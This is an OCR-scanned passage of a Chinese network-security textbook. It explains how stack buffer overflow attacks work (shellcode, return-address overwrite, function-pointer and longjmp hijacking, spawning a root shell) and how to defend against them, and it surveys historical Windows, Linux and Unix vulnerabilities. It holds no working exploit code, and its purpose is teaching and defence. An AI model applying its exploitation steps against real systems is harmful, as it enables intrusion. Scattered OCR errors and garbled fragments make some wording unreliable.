长 度 的 字符 串 拷贝 到 具有 16 字 节 长 的 局 部 缓冲 区 中 去 ， 在 调用 strcpy0 进 行 字 符 串 拷贝 
时 没有 进行 缓冲 区 越界 检查 。 图 3-41 中 可 以 看 到 执行 函数 fanction0 时 的 堆栈 情形 。 

执行 此 程序 得 不 到 输出 “Thisisatest”。 因 为 程序 没有 执行 到 这 一 步 ， 当 程序 执行 到 
function0 时 ， 子 程序 执行 完毕 ， 应 返回 到 执行 print (“Thisisatestin”) 处 ， 但 是 ， 由 于 组 
冲 区 已 经 洲 出 ,， 子 程序 的 返回 地 址 变 成 了 0x41414141 个 显然 还 在 进程 地 址 空间 但 
已 不 是 程序 正常 流程 的 地 址 一 一 无 法 预料 在 这 里 程序 会 执行 什么 指令 ， 但 本 程序 很 小 ， 
不 会 引起 严重 后 果 。 因为 0x41414141 是 在 主 程序 中 对 字符 串 数组 赋值 时 写 入 的 值 , 可 以 
设想 ， 假 如 在 主 程序 中 对 字符 串 数组 赋值 时 ， 将 一 个 有 和 危险 指令 序列 的 地 址 以 字符 串 方 
式 填 入 在 刚好 覆盖 子 程序 返回 地 址 的 数组 位 置 ， 那 么 子 程序 执行 完 返回 时 ， 就 会 执行 这 
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一 段 危险 指令 ， 其 后 果 将 是 不 可 预料 的 。 

缓冲 区 溢出 程序 正 是 以 这 种 原理 来 工作 的 ， 但 是 要 想 使 它 能 够 执行 任意 命令 并 没有 
这 么 简单 。 
内 存 高 端 
压 入 堆栈 中 
传递 的 参数 


Buffer 
16 字 节 空间 


内 存 低 端 


执行 strcpy() 之 前 执行 strcpy() 之 后 


图 3-41 调用 函数 functionO 时 堆栈 的 情形 


3. 缓冲 区 溢出 程序 的 要 素 及 执行 步骤 

通过 上 面 的 分 析 可 知 ， 修 改 程序 的 返回 地 址 ， 让 它 去 执行 一 段 精心 准备 的 程序 ， 可 
以 达到 攻击 的 目的 。 

一 个 缓冲 区 溢出 程序 的 执行 通常 由 4 个 步骤 组 成 : 

@ 准备 一 段 可 以 调 出 一 个 shell 的 机 器 码 形式 的 字符 串 ， 称 之 为 SHELLCODE。 

@ 申请 一 个 缓冲 区 ， 并 将 机 器 码 填 入 缓冲 区 的 低 端 。 

@ 估算 机 器 码 在 堆栈 中 的 起 始 位 置 ， 并 将 这 个 位 置 写 入 缓冲 区 的 高 端 。 

@ 将 这 个 缓冲 区 作为 系统 一 个 有 着 缓冲 区 溢出 错误 的 程序 的 一 个 入 口 参数 ， 并 执 
行 这 个 有 错误 的 程序 。 

例如 ， 利 用 缓冲 区 溢出 漏洞 攻击 root 程序 ， 通 过 执行 类 似 “exec (sh)” 的 执行 代码 
来 获得 root 的 shell。 黑 客 要 达到 目的 通常 要 完成 两 个 任务 : 在 程序 的 地 址 空间 里 安排 适 
当 的 代码 ;通过 适当 初始 化 寄存 器 和 存储 器 ， 让 程序 跳 转 到 安排 好 的 地 址 空间 执行 。 

(1) 在 程序 的 地 址 空间 安排 适当 的 代码 

在 程序 的 地 址 空间 里 安排 适当 的 代码 往往 是 相对 简单 的 ， 如 果 要 攻击 的 代码 在 所 攻 
击 程序 中 已 经 存在 了 ， 只 需 简单 地 对 代码 传递 一 些 参数 ， 然 后 使 程序 跳 转 到 目标 中 就 可 
以 完成 了 。 例如 , 攻击 代码 要 求 执 行 “exec ( ‘/bin/sh’ )” 而 在 libe 库 中 的 代码 执行 “exec 
(Carg)”， 其 中 的 “arg” 是 个 指向 字符 串 的 指针 参数 ， 只 要 把 传 入 的 参数 指针 修改 ， 让 它 
指向 “/bin/sh”， 然 后 再 跳 转 到 libe 库 中 的 相应 指令 序列 就 行 了 。 这 个 可 能 性 是 很 小 的 ， 
一 般 情况 下 要 用 “ 植 入 法 ”的 方式 来 完成 , 具体 是 指向 要 攻击 的 程序 里 输入 一 个 字符 串 ， 
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程序 就 会 把 这 个 字符 串 放 到 缓冲 区 中 ， 这 个 字符 串 包含 的 数据 是 可 以 在 攻击 目标 的 硬件 
平台 上 运行 的 指令 序列 。 缓冲 区 可 以 设 在 堆栈 (自动 变量 )、 堆 (动态 分 配 的 ) 和 静态 数 
据 区 初始 化 或 者 未 初始 化 的 数据 〉 等 的 任何 地 方 。 

(2) 将 控制 程序 转移 到 攻击 代码 的 方式 

所 有 的 这 些 方 法 都 是 在 寻求 改变 程序 的 执行 流程 ， 使 它 跳 转 到 攻击 代码 ， 最 为 基本 
就 是 溢出 一 个 没有 检查 或 者 其 他 漏洞 的 缓冲 区 ， 扰 乱 程 序 的 正常 执行 次 序 。 通 过 溢出 某 
缓冲 区 ， 可 以 改写 相近 程序 的 空间 而 直接 跳 过 系统 对 身份 的 验证 。 原 则 上 讲 攻 击 时 所 针 
对 的 缓冲 区 溢出 的 程序 空间 可 为 任意 空间 。 因 不 同 地 方 的 定位 相 异 ， 出 现 了 多 种 转移 
Fie 

@ FunctionPointers (函数 指针 ) 

在 程序 中 ,“void (*foo)()” 声 明了 一 个 返回 值 为 “void”FunctionPointers 的 变量 
“foo”. FunctionPointers 可 以 用 来 定位 任意 地 址 空间 ， 攻 击 时 只 需要 在 任意 空间 里 的 
FunctionPointers 邻近 处 找到 一 个 能 够 溢出 的 缓冲 区 ,然后 用 溢出 来 改变 FunctionPointers。 
当 程 序 通 过 FunctionPointers 调用 函数 ， 程 序 的 流程 就 会 实现 。 

@ ActivationRecords (激活 记录 ) 

一 个 函数 调用 发 生 时 ， 堆 栈 中 会 留 驻 一 个 ActivationRecords， 它 包含 了 函数 结束 时 
返回 的 地 址 。 溢出 这 些 自动 变量 , 使 这 个 返回 地 址 指向 攻击 代码 来 改变 程序 的 返回 地 址 。 
当 函 数 调用 结束 时 ， 程 序 就 会 跳 转 到 事先 所 设 定 的 地 址 ， 而 不 是 原来 的 地 址 。 

@) Longjmpbuffers 〈 长 跳 转 缓冲 区 ) 

C 语言 中 包含 了 一 个 简单 的 检验 /恢复 系统 ， 称 为 “setjmp/longjmp”， 意 为 在 检验 点 
设 定 “setjmp (buffer)”, 用 longjmp (buffer)“ 恢 复 检验 点 ”。 如 果 攻 击 时 能 进入 缓冲 区 
空间 ,“1longjmp (buffer)” 实 际 上 是 跳 转 到 攻击 的 代码 。 像 FunctionPointers 一 样 , longjmp 
缓冲 区 能 够 指向 任何 地 方 ， 只 要 找到 一 个 可 供 溢出 的 缓冲 区 。 

© 植 入 码 和 流程 控制 

常见 的 缓冲 区 溢出 攻击 类 是 在 一 个 字符 串 里 综合 了 代码 植 入 和 ActivationRecords. 
缓冲 区 溢出 改变 ActivationRecords 的 同时 植 入 代码 ( 因 C 在 习惯 上 只 为 用 户 和 参数 开辟 
很 小 的 缓冲 区 )。 植 入 代码 和 缓冲 区 溢出 不 一 定 要 一 次 完成 , 可 以 在 一 个 缓冲 区 内 放置 代 
码 (这 个 时 候 并 不 能 溢出 缓冲 区 ), 然后 通过 溢出 另 一 个 缓冲 区 来 转移 程序 的 指针 。 这 种 
方法 一 般 用 于 可 供 溢 出 的 缓冲 区 不 能 放 入 全 部 代码 的 攻击 。 使 用 缓冲 区 溢出 改变 程序 的 
参数 然后 利用 另 一 个 缓冲 区 溢出 使 程序 指针 指向 libe 中 的 特定 的 代码 段 。 可 见 程序 编写 
的 错误 造成 网 络 的 不 安全 性 应 当 受 到 重视 ， 因 为 它 的 不 安全 性 已 被 缓冲 区 溢出 表现 得 淋 
WRT « 

所 有 的 缓冲 区 溢出 漏洞 几乎 都 归 因 于 C 语言 。 如 果 只 有 类 型 安全 的 操作 才 可 以 被 允 
许 执行 ， 就 不 会 出 现 对 变量 的 强制 操作 。 类 型 安全 的 语言 有 Java 和 ML 等 ， 但 作为 Java 
执行 平台 的 Java 虚拟 机 是 C 程序 ， 所 以 攻击 JVM 的 途径 就 是 使 JVM 的 缓冲 区 溢出 。 
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缓冲 区 溢出 攻击 利用 了 目标 程序 的 缓冲 区 溢出 漏洞 ， 操 作 目 标 程 序 堆栈 输入 过 长 的 
字符 串 ， 这 带 来 两 种 后 果 ， 一 是 过 长 的 字符 串 履 盖 了 相 邻 的 存储 单元 而 造成 程序 瘫痪 ， 
甚至 造成 宕 机 、 系 统 或 进程 重启 等 ， 二 是 可 让 攻击 者 运行 恶意 代码 ， 执 行 任意 指令 ， 甚 
至 获得 超级 用 户 权 限 等 。 

总 而 言 之 ， 这 种 攻击 能 够 成 功 主要 是 利用 了 程序 中 边界 条 件 、 函 数 指针 等 设计 不 当 
的 漏洞 ， 即 利用 了 C 程序 本 身 的 不 安全 性 。 而 大 多 数 Unix、Linux、Windows 系统 的 开 
发 都 依赖 于 C 语言 ， 所 以 缓冲 区 溢出 攻击 成 为 操作 系统 、 数 据 库 等 应 用 程序 最 普遍 的 漏 
洞 之 一 。 

4. 缓冲 区 溢出 攻击 的 防范 策略 

缓冲 区 溢出 攻击 的 防范 是 和 整个 系统 的 安全 性 分 不 开 的 。 如 果 整 个 网 络 系统 的 安全 
设计 很 差 ， 则 遭受 缓冲 区 溢出 攻击 的 机 会 也 大 大 增加 。 针 对 缓冲 区 溢出 ， 可 以 采取 多 种 
防范 策略 。 

(1) 系统 管理 上 的 防范 策略 

。 关闭 不 需要 的 特权 程序 。 

。 及 时 给 程序 漏洞 打 补 丁 。 

(2) 软件 开发 过 程 中 的 防范 策略 

发 生 缓 冲 区 溢出 的 主要 及 各 要 素 是 : 数组 没有 边界 检查 而 导致 的 缓冲 区 溢出 ;函数 
返回 地 址 或 函数 指针 被 改变 , 使 程序 流程 的 改变 成 为 可 能 ; 植 入 代码 被 成 功 的 执行 等 等 。 
所 以 针对 这 些 要 素 ， 从 技术 上 可 以 采取 一 定 的 措施 。 

。 编写 正确 的 代码 。 只 要 在 所 有 拷贝 数据 的 地 方 进行 数据 长 度 和 有 效 性 的 检查 ， 确 
保 目 标 缓冲 区 中 数据 不 越界 并 有 效 ， 则 就 可 以 避免 缓冲 区 溢出 ， 更 不 可 能 使 程序 
跳 转 到 恶意 代码 上 。 
缓冲 区 不 可 执行 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ， 从 而 使 得 攻击 
者 不 可 能 执行 被 植 入 被 攻击 程序 输入 缓冲 区 的 代码 ， 这 种 技术 被 称 为 缓冲 区 不 可 
执行 技术 。 

。 改进 C 语 言 函 数 库 。C 语言 中 存在 缓冲 区 溢出 攻击 隐患 的 系统 函数 有 很 多 。 例 如 
gets(), sprintf), strepy(), streat(), fscanf(), scanf(), vsprintfQ“. BY LATE ACH E 
安全 的 封装 了 若干 已 知 易 受 堆栈 溢出 攻击 的 库 函 数 。 

。 使 堆栈 向 高 地 址 方向 增长 。 使 用 的 机 器 堆栈 压 入 数据 时 向 高 地 址 方向 前 进 ， 那 么 

无 论 缓 冲 区 如 何 溢出 ， 都 不 可 能 覆盖 低地 址 处 的 函数 返回 地 址 指针 ， 也 就 避免 了 

缓冲 区 溢出 攻击 。 但 是 这 种 方法 仍然 无 法 防范 利用 堆 和 静态 数据 段 的 缓冲 区 进行 

溢出 的 攻击 。 

程序 指针 完整 性 检查 。 原理 是 在 每 次 在 程序 指针 被 引用 之 前 先 检测 该 指针 是 否 已 

被 恶意 改动 过 ， 如 果 发 现 被 改动 ， 程 序 就 拒绝 执行 。 

。 利 用 编译 器 将 静态 数据 段 中 的 函数 地 址 指针 存放 地 址 和 其 他 数据 的 存放 地 址 分 离 。 
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3.3.5.3 ”系统 漏洞 

操作 系统 是 计算 机 系统 最 基本 也 是 最 重要 的 系统 软件 ， 它 的 安全 性 在 某 种 程度 上 决 
定 了 整个 计算 机 系统 的 安全 性 。 如 果 操 作 系统 本 身 存 在 严重 的 安全 漏洞 ， 就 算 其 他 软件 
系统 天 衣 无 颖 也 是 枉然 。 然 而 很 遗憾 的 是 ， 经 常 使 用 的 系统 ， 特 别 是 微软 的 Windows 操 
作 系统 ， 都 存在 着 或 多 或 少 的 漏洞 ， 遭 受 黑客 攻击 以 及 病毒 感染 的 事件 屡屡 发 生 ， 给 用 
户 带 来 巨大 的 麻烦 和 严重 的 损失 。 下 面 就 先 来 看 看 一 些 典 型 的 系统 漏洞 及 针对 这 些 漏洞 
所 实施 的 攻击 。 

1. Windows 系统 的 常见 漏洞 分 析 

Windwos2000 及 其 以 前 的 版 本 存在 许多 安全 漏洞 , 如 Windwos2000 系统 上 著名 的 输 
入 法 登录 漏洞 等 。 由 于 这 些 版 本 过 于 陈旧 ， 使 用 者 渐 少 ， 在 此 就 不 再 袭 述 。 微 软 在 其 后 
续 版 本 中 弥补 了 这 些 发 现 的 漏洞 并 不 断 增 强 了 系统 的 安全 性 。 但 是 一 些 漏 洞 仍 不 断 被 发 
IL, 如 2003 年 上 半年 出 现 的 利用 系统 的 远程 过 程 调 用 (RPC) 漏洞 的 冲击 波 病毒 对 各 种 
Windows 版 本 产生 强大 的 攻击 和 破坏 ， 虽 然 微 软 公 司马 上 发 布 了 他 们 的 系统 补丁 ， 但 对 
用 户 造成 的 损失 仍然 十 分 巨大 。 

微软 在 WindowsXP 的 安全 性 方面 做 了 许多 工作 ， 增 加 了 许多 新 的 安全 功能 。 例 如 ， 
Intemet 连接 防火 墙 , 支持 多 用 户 的 加 密 文 件 系统 , 改进 的 访问 控制 , 对 智能 卡 的 支持 等 。 
Internet 连接 防火 墙 是 WindowsXP 的 重要 特性 之 一 。 它 可 用 于 在 使 用 Internet 连接 共享 
时 保护 NAT 机 器 和 内 部 网 络 ， 也 可 用 于 保护 单机 。 所 以 ， 看 起 来 它 既 像 主 机 防火 墙 又 
像 网 络 防火 墙 。 实际 上 ，Intemet 连接 防火 墙 属于 个 人 防火 墙 ， 它 的 功能 比 常见 的 主机 防 
火 墙 BlackICE 和 ZoneAlarm 以 及 网 络 防火 墙 PIX 和 Netscreen 等 都 相差 其 大 。 它 最 适合 
保护 本 机 的 Internet 连接 。 事 实 上 ， 一 旦 启用 了 Internet 连接 防火 墙 ， 只 有 经 过 域 认 证 的 
用 户 才 可 以 正常 访问 主机 ， 而 所 有 其 他 来 自 Internet 的 TCP/ICMP 连接 包 都 将 被 丢弃 ， 
这 可 以 较 好 地 防止 端口 扫描 和 拒绝 服务 攻击 。 在 Windows2000 中 ， 微 软 就 采用 了 基于 公 
共 密 钥 加 密 技术 的 加 密 文件 系统 EFS)。 在 WindowsXP 中 ， 对 加 密 文件 系统 做 了 进 一 
步 改进 ， 使 其 能 够 让 多 个 用 户 同时 访问 加 密 的 文档 。 用 户 可 以 通过 设置 加 密 属 性 的 方式 
对 文件 或 文件 夹 实 施加 密 ， 其 操作 过 程 就 像 设 置 其 他 属性 一 样 。 如 果 对 一 个 文件 夹 进行 
WME, 那么 ,在 此 文件 夹 中 创建 或 添加 的 所 有 文件 和 子 文件 夹 都 将 自动 进行 加 密 。 因 此 ， 
在 文件 夹 级 别 上 实施 加 密 操作 是 比较 合适 的 .EFS 还 允许 在 Web 服务 器 上 存储 加 密 文 件 。 
这 些 文件 通过 Internet 进行 传输 并 且 以 加 密 的 形式 存储 在 服务 器 上 。 当 用 户 需 要 使 用 自 
己 的 文件 时 ， 它 们 将 以 透明 方式 在 用 户 的 计算 机 上 进行 解密 。 这 种 特性 允许 以 安全 方式 
在 Web 服务 器 上 存储 相对 敏感 的 数据 ， 而 不 必 担心 数 据 被 窃取 , 或 在 传输 过 程 中 被 他 人 
读 取 。WindowsXP 对 访问 控制 方面 的 策略 做 了 较 多 的 改进 。 主 要 有 ， 限 制 网 络 用 户 为 来 
宾 账 号 的 策略 ， 空 口令 限制 策略 ， 借 助 MicrosoftPassport 实现 的 单一 登录 方式 ， 针 对 漫 
游 用 户 的 凭证 管理 等 。 例 如 ， 和 凭证 管理 特性 为 包括 密码 和 X.509 证 书 在 内 的 用 户 凭 证 提 
供 了 安全 的 存储 方式 。 该 特性 为 包括 漫游 用 户 在 内 的 所 有 用 户 提供 了 一 致 性 的 单一 签名 
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体验 。 如 果 用 户 需要 访问 公司 网 络 中 的 一 个 应 用 程序 ， 那 么 ， 在 首次 进行 尝试 时 ， 用 户 
需要 进行 身份 验证 ， 并 根据 提示 信息 提供 一 个 凭证 。 在 提供 该 凭证 后 ， 它 将 与 所 请 求 的 
应 用 程序 建立 关联 。 当 用 户 再 次 访问 该 应 用 程序 时 ， 原 先 所 保存 的 凭证 将 在 无 须 重新 输 
入 的 情况 下 再 次 使 用 。 智 能 卡 性 能 集成 到 操作 系统 中 ， 包 括 支持 智能 卡 登录 到 终端 服务 
器 会 话 。 对 智能 卡 的 内 在 支持 使 基于 智能 卡 的 安全 技术 应 用 更 为 方便 。 例 如 ， 私 有 密 钥 
和 其 他 个 人 标识 的 存储 等 。 

WindowsXP 发 布 后 , 与 之 有 关 的 漏洞 有 : UPnP 拒绝 服务 漏洞 、GDI 拒绝 服务 漏洞 、 
终端 服务 TP 地 址 欺骗 漏洞 。 UPnP 拒绝 服务 漏洞 的 描述 是 这 样 的 : 通用 即 插 即 用 (UPnP) 
服务 使 计算 机 能 够 发 现 和 使 用 基于 网 络 的 设备 。WindowsME 和 XP 自 带 UPnP 服务 ; 由 
于 UPnP 服务 不 能 正确 地 处 理 某 种 类 型 的 无 效 请 求 ， 因 此 产生 了 一 个 安全 漏洞 。 
Windows98、98SE 和 ME 系统 在 接收 到 这 样 的 一 个 请 求 之 后 会 出 现 各 种 后 果 ， 可 能 造成 
性 能 降低 甚至 系统 崩溃 ， WindowsXP 系统 受到 的 影响 没有 那么 严重 ， 因 为 该 漏洞 含有 一 
个 内 存 泄 露 问题 ，WindowsXP 系统 每 次 接收 到 这 样 的 一 个 请 求 时 ， 就 会 有 一 小 部 分 系统 
内 存 无 法 使 用 ， 如 果 这 种 情况 重复 发 生 ， 就 会 耗 尽 系统 资源 ， 使 性 能 降低 ， 甚 至 完全 
终止 。 

WindowsVista 是 微软 按照 自己 的 安全 开发 生命 周期 (SecurityDevelopmentLifecycle) 
开发 的 第 一 个 Windows 客户 端 ， 从 一 开始 ， 就 把 安全 放 在 了 首要 地 位 ， 定 义 了 每 一 位 开 
发 人 员 都 必须 遵守 的 可 重复 的 工程 过 程 ， 并 在 该 过 程 发 布 之 前 进行 过 验证 。 为 了 从 架构 
级 提升 安全 性 ，WindowsVista 采用 了 一 个 新 的 策略 ，Windows 服务 加 强 策略 
(WindowsServiceHardening)。 该 策略 提升 系统 服务 的 安全 性 。WindowsVista 还 通过 改进 
测试 和 开发 过 程 来 降低 缓冲 区 溢出 漏洞 的 危险 ,并且 还 针对 64 位 系统 的 安全 性 在 很 多 方 
面 有 增强 。 有 了 用 户 账号 控制 ， 日 常用 户 都 可 以 更 容易 地 管理 自己 的 账号 ， 从 一 定 程度 
KUE, IRTA. Windows 登录 架构 也 被 重新 设计 ， 提 升 了 可 靠 性 、 提 供 了 增强 的 认 
证 方法 。 网 络 访问 防 (NetworkAccessProtection) 帮助 保持 共享 网 络 的 安全 性 ， 所 采取 的 
措施 是 给 了 网 络 管理 员 的 工具 ， 可 以 把 不 安全 的 机 器 从 网 络 中 隔离 出 来 。 改 进 了 的 对 智 
能 卡 的 支持 使 得 公司 可 以 更 加 容易 地 用 多 因子 认证 增强 密码 的 安全 性 。 

虽然 WindwosXP 和 Vista 的 安全 性 较 之 以 前 的 版 本 要 高 许多 , 但 漏洞 的 发 现 仍 时 有 
发 生 。 现 列举 儿 例 以 供 读者 参考 。 

d) 系统 热 键 漏洞 

热 键 (HotKey) 是 用 来 启动 一 个 程序 或 者 使 用 一 个 程序 的 某 项 功能 的 一 个 键 和 一 组 
键 ， 一 个 键 可 以 包括 F1，F2 这 些 功 能 键 ， 也 可 以 是 一 些 特制 的 键 ， 比 如 Dell 键盘 上 的 
“Internet”, “mail” 等 一 般 键盘 上 没有 的 键 ， 最 常见 的 主要 是 一 些 组 合 键 ， 使 用 QQ 的 人 
最 熟悉 的 热 键 是 “Ctl 十 ~” 组 合 键 ， 用 来 打开 快捷 地 查看 发 来 的 信息 。 还 有 许多 热 键 可 
以 用 来 打开 程序 ， 这 些 热 键 一 般 自己 可 以 设置 ， 设 置 后 可 以 用 来 打开 各 种 程序 ， 可 以 为 
每 个 程序 的 设置 确定 规则 ， 这 样 就 可 以 有 效 地 利用 热 键 的 功能 ， 比 如 按照 程序 的 首 字母 


第 3 章 网 络 安全 基础 


来 命名 ， 这 样 经 过 设置 后 ， 就 可 以 方便 地 用 “Ctl 十 Alt+N” 打 开 记 事 本 ， 用 “Ctl 十 Alt 
十 W” 打 开 Word， 对 于 那些 对 某 个 工具 特别 依赖 的 人 来 说 ， 这 样 的 打开 程序 的 方式 是 很 
方便 的 ， 因 此 被 广泛 使 用 。 

在 办 公 的 时 候 ， 人 们 常常 需要 暂时 离开 一 下 ， 这 样 就 有 可 能 信息 被 窥 或 丢失 甚至 造 
成 更 严重 的 后 果 ， 所 以 就 有 了 屏幕 保护 程序 。 如 果 设 了 密码 ， 那 么 一 般 情 况 下 ， 别 人 就 
动 不 了 计算 机 ,这 样 就 保证 了 安全 。 在 WindowsXP 中 , 它 提供 一 种 称 之 为 “ 自 注 销 ”( 即 
自动 注销 ) 的 功能 ， 这 种 功能 与 屏幕 保护 程序 有 着 异曲同工 之 妙 ， 在 计算 机 有 一 段 时 间 
处 于 静止 状态 后 它 就 自动 注销 ， 不 过 这 种 “注销 ”是 一 种 假 注销 ， 所 有 的 后 台 程序 都 还 
在 运行 ， 跟 没有 注销 前 几乎 没有 什么 差别 ， 这 就 留 下 了 隐患 。 

热 键 功能 是 系统 提供 的 一 个 服务 〈 专 指 打开 程序 ， 使 用 程序 的 热 键 )， 从 开始 启动 
一 直到 出 现 登录 界面 ， 这 个 服务 一 直 没 有 执行 ， 当 以 某 一 用 户 的 身份 登录 时 ， 这 个 功能 
方才 启动 。 执 行 之 后 ,用 户 就 可 以 使 用 用 户 自己 设置 (包括 一 些 默认 的 热 键 ) 的 热 键 了 。 
假设 一 用 户 〈 他 有 管理 员 的 身份 ， 并 以 管理 员 登 录 ) 有 事 离开 一 段 时 间 ， 他 的 计算 机 就 
暴露 在 没有 保护 的 情况 下 了 ， 这 时 WindowsXP (这 里 提 到 的 计算 机 的 操作 系统 都 专 指 
WindowsXP， 而 且 该 操作 系统 并 没有 设置 屏幕 保护 程序 和 相应 的 密码 ) 就 非常 聪明 地 自 
动 实施 了 “ 自 注 销 ”。 如 果 这 种 注销 是 真 的 注销 了 ， 那 么 这 种 安全 措施 显然 是 非常 好 的 ， 
但 正如 前 面 所 讲 ， 这 种 注销 是 假 的 ， 虽 然 其 他 人 已 经 进 不 了 机 器 ， 看 不 到 计算 机 里 的 内 
容 ， 但 他 们 还 可 以 使 用 热 键 ， 因 为 热 键 服务 还 没有 停止 。 

这 时 一 个 有 敌意 的 并 且 经 验 丰 富 的 人 就 可 以 利用 这 些 热 键 干 一 些 事 ， 最 简单 比如 打 
开 N 个 大 程序 ， 来 破坏 机 器 ， 可 以 打开 并 使 用 某 个 程序 ， 特 别 是 一 些 与 网 络 有 关 的 敏感 
程序 (和 服务 ) 等， 实际 上 这 台 计 算 机 被 他 控制 了 一 半 。 

(2) Windows 重 定 问 器 (WindowsRedirector) 漏洞 

该 漏洞 如 果 被 恶意 使 用 ， 普 通用 户 就 可 能 取得 管理 员 权限 ， 但 好 在 该 漏洞 无 法 被 远 
程 恶意 使 用 ， 因 此 其 严重 等 级 被 设 为 第 二 级 别 ， 为 “重要 ”级 。 

该 安全 漏洞 在 于 访问 本 地 及 远程 文件 时 所 使 用 的 “Windowsredirector”。 由 于 
WindowsXP 中 的 Windowsredirector 存在 未 经 检测 的 缓冲 区 ,因此 如 果 有 人 发 送 某 些 特定 
的 数据 ， 就 会 引起 缓冲 区 溢出 ， 从 而 导致 OS 异常 关闭 ， 或 者 执行 任意 指令 。 

不 过 ， 不 能 注册 到 对 象 机 器 上 的 用 户 ( 没 有 账户 的 用 户 ) 将 无 法 恶意 使 用 此 安全 漏 
洞 。 要 想 恶 意 使 用 此 漏洞 ， 就 必须 以 对 话 的 形式 登录 到 对 象 机 器 中 ， 然 后 运行 使 用 
Windowsredirector 的 程序 (比如 “NETUSE” 命 令 )， 并 将 特定 数据 读 取 到 Windowsre 
director 中 。 

因此 ， 恶 意 使 用 此 漏洞 的 后 果 是 普通 用 户 ( 或 者 知道 普通 用 户 账号 的 攻击 者 能 
取得 高 于 允许 权限 的 “管理 员 权限 ”， 即 “权限 提升 ?。 提 升 权 限 后 ， 就 会 允许 普通 用 户 
变更 原本 不 允许 的 设置 ， 以 及 运行 原本 不 允许 运行 的 程序 等 。 

(3) 资源 管理 器 内 存 破 坏 漏 洞 


Goo 


Bosh 
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WindowsXP 包含 的 资源 管理 器 处 理 部 分 文件 时 存在 问题 , 攻击 者 可 以 利用 这 个 漏洞 
使 资源 管理 器 崩溃 ， 造 成 拒绝 服务 。 

一 个 畸形 的 .emf (Metafile， 图 形 格式 ) 文件 可 导致 在 shimgvw.dll 中 触发 溢出 。 如 
emf 文件 中 的 “totalsize” 字 段 设 置 小 于 头 字 段 Cheader) 大 小 ，explorerexe 处 理 时 会 
触发 基于 堆 的 溢出 。 

(4) 帮助 支持 中 心 接口 欺骗 漏洞 

帮助 和 支持 中 心 可 以 提供 用 户 集中 化 服务 和 帮助 ， 如 提供 产品 文档 、 判 断 硬件 兼容 
性 帮助 、 访 问 Windows 更 新 、Microsoft 在 线 帮 助 等 。 用 户 和 程序 可 以 通过 使 用 “hcp://” 
前 级 执行 URI 链接 来 访问 帮助 和 支持 中 心 。 

Microsoft WindowsXP 帮助 和 支持 中 心 的 接口 可 伪造 ， 远 程 攻击 者 可 以 利用 这 个 漏 
洞 欺骗 用 户 ， 访 问 恶意 内 容 。 通 过 恶意 链接 ， 攻 击 者 可 以 伪造 WindowsXP 帮助 和 支持 
中 心 ， 从 而 达到 欺骗 用 户 并 恶意 获取 用 户 信息 等 目的 。 

(5) ANI 安全 漏洞 

目前 国内 外 的 很 多 网 站 都 开始 利用 该 漏洞 传播 恶意 软件 及 盗号 木马 、 蠕 虫 病毒 。 该 
漏洞 的 利用 程序 通常 伪装 成 一 个 图 片 ， 只 要 点 击 了 带 有 恶意 代码 图 片 的 网 站 或 邮件 ， 就 
会 被 感染 上 恶意 程序 ， 并且 无 论 是 IE6 或 IE7, 或 者 是 FireFox\Opera 等 非 TE 浏览 器 。 无 
论 是 WindowsNT\2000\XP\2003\ Vista 操作 系统 都 有 被 感染 的 可 能 ， 其 他 网 络 应 用 软件 如 
QQ、MSN、 各 种 邮件 软件 、RSS 软件 等 也 可 能 受到 该 漏洞 的 影响 。 一 旦 没有 补丁 的 机 
器 打开 了 包含 恶意 代码 的 网 站 或 邮件 病毒 或 恶意 程序 就 会 立即 悄悄 在 后 台 运 行 ， 在 没有 
任何 反应 的 情况 下 使 用 户 的 机 器 中 上 盗号 木马 、 恶 意 广 告 软件 、 蠕 虫 病毒 等 等 。 请 注意 
Windows 资源 管理 器 也 会 处 理 一 些 文件 扩展 名 的 ANI 文件 ， 如 .ani、.cur、.ico 等 。 

2. 其 他 操作 系统 的 安全 漏洞 

除了 微软 公司 的 Windows 操作 系统 以 外 , 其 余 的 几 种 常见 的 操作 系统 如 Linux, Unix 
等 ， 其 各 种 不 同 版 本 也 或 多 或 少 地 存在 某 些 安全 漏洞 ， 尽 管 它们 的 推崇 者 一 向 认为 Unix 
类 的 系统 比 Windows 要 安全 许多 。 

例如 ，Linux 操作 系统 的 核心 部 位 就 曾 出 现 一 个 安全 漏洞 (2003 年 3 H), 该 漏洞 能 
使 那些 只 许可 登录 某 机 器 的 局 部 用 户 获得 “ 根 目录 ” 访 问 权 , 并 对 该 机 器 进行 完全 控制 。 
这 种 局 部 缺陷 造成 的 不 良 后 果 比 远程 缺陷 要 轻 ， 远 程 缺陷 能 让 网 络 攻击 者 接管 某 机 器 ， 
即使 这 些 攻 击 者 连 基本 的 用 户 账号 都 没有 。 这 个 故障 影响 到 Linux 的 “ptrace” 组 件 ， 该 
组 件 有 助 于 发 现 软件 中 的 缺陷 。 

Linux 内 核 在 处 理 畸 形 ELF 二 进 制 文件 时 也 存在 问题 ， 本 地 攻击 者 可 以 利用 这 个 漏 
洞 进行 拒绝 服务 攻击 。 该 问题 在 execve0 系 统 函数 处 理 畸 形 ELF 程序 时 触发 。 

LinuxKemelSamba 是 用 于 共享 的 应 用 系统 。 当 执行 远程 Samba 共享 系统 上 的 文件 时 
没有 进行 充分 完整 性 检查 , 本 地 攻击 者 可 以 利用 这 个 漏洞 提升 权限 。 问题 存在 于 smbmnt 
中 ， 当 安装 Samba 时 ， 部 分 Linux 系统 以 SETUIDROOT 属性 安装 ， 由 于 执行 共享 系统 
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上 的 文件 时 缺少 充分 完整 检查 ， 任 何 拥有 本 地 账户 的 攻击 者 如 果 他 们 可 以 设置 一 个 
Samba 服务 器 并 能 从 目标 机 器 上 挂 接 ， 就 可 能 获得 root 用 户 权限 。 

惠普 高 端 Unix 操作 系统 也 曾 发 现 一 些 安全 漏洞 (2004 年 1 月 )。 这 些 安全 漏洞 可 能 
使 攻击 者 控制 服务 器 或 者 使 服务 器 离线 。 惠普 的 Tru64Unix 操作 系统 在 执行 Psec (互联 
网 协议 安全 ) 和 SSH (安全 外 围 程序 ) 程序 时 会 出 现 可 被 攻击 者 利用 的 安全 漏洞 ， 这 两 
个 严重 的 安全 漏洞 都 出 现在 这 种 操作 系统 的 关键 组 件 中 ， 并 且 都 能 够 让 恶意 用 户 控制 服 
务 器 或 者 发 动 拒绝 服务 攻击 。SSH 用 于 向 服务 器 安全 地 发 送 指令 ，IPSec 用 于 创建 虚拟 
专用 网 ， 以 便 通 过 网 络 在 计算 机 之 间 传 递 加 密 的 信息 。 

针对 系统 漏洞 ， 应 当 及 时 更 新 系统 补丁 ， 如 果 是 Windows 系统 可 以 利用 
